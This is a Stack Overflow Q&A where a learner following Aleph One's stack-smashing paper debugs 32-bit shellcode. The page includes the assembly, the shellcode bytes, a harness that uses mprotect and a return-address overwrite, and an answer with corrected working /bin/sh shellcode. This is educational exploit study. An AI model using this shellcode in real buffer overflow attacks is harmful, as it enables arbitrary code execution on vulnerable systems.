2

I am trying to implement the codes given in smashing the stack for fun and profit by Aleph to learn the basics of buffer overflow attacks.

Machine architecture: Ubuntu 12.10 64 bit

programs compiled using -m32 flag in gcc

So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem. The assembly code for spawning the shell:

void main() {
     __asm__(
        "Start:"
        "jmp    CallCode\n\t"
        "CallPop:"                    
        "popl   %esi\n\t"
        "movl   %esi,0x8(%esp)\n\t"           
        "xorl   %eax,%eax\n\t"                
        "movb   %al,0x7(%esp)\n\t"      
        "movl   %eax,0xc(%esp)\n\t"           
        "movb   $0xb,%al\n\t"                 
        "movl   %esi,%ebx\n\t"                
        "leal   0x8(%esp),%ecx\n\t"           
        "leal   0xc(%esp),%edx\n\t"           
        "int    $0x80\n\t"                    
        "xorl   %ebx,%ebx\n\t"                
        "movl   %ebx,%eax\n\t"                
        "inc    %eax\n\t"                     
        "int    $0x80\n\t"
        "CallCode:"                   
        "call   CallPop\n\t"                    
        ".string \"/bin/sh\"\n\t"
        );
 }

Corresponding hex code is:

#include <sys/mman.h>
#include<stdio.h>

#define PAGE_SIZE 4096U

char shellcode[] = "\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
"\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
"\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";


void test_shellcode() {

    int *ret;

    // The data section is non-executable
    // Change protection bits for the page containing our shellcode

    mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)), 2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);

    ret = (int*)((char *)&ret + 16);
    (*ret) = (int)shellcode;
}

int main() {
    test_shellcode();   
    return 0;
}

A bit of analysis using GDB Debugger led me to these results:

(gdb) run
Starting program: /home/peps/CCPP/Hello/testsc3 

Program received signal SIGILL, Illegal instruction.
0x0804a067 in shellcode ()
(gdb) x/s 0x0804a067
0x804a067 <shellcode+39>:   "\377\377\377/bin/sh"

After applying breakpoints, I think the problem lies somewhere in the hex code, which I have not been able to figure out. Also, I don't seem to understand the context of Illegal instruction here.

Any help would be appreciated.

Improve this question
2
  • gdb is able to disassemble machine code (e.g. with dis or x/i) Commented May 8, 2013 at 12:17
  • I have used disassemble command fair number of times, in fact the assembly code it generated has been used in the first code, and also was quite useful in finding the return addresses. But how to make use of it for finding problem in hex code, I am out of ideas here. Commented May 8, 2013 at 12:25

1 Answer 1

Reset to default
5

You made a couple of mistakes in your shellcode.

char shellcode[] = 
"\xeb\x24\x5e\x89\x74\x24\x08\x31"
"\xc0\x88\x44\x24\x07\x89\x44\x24"
"\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
"\x08\x8d\x54\x24\x0c\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"
"\xff\xff\xff/bin/sh";
Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

it worked!! Thanks a lot!! What a silly silly error that was! My bad!!

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.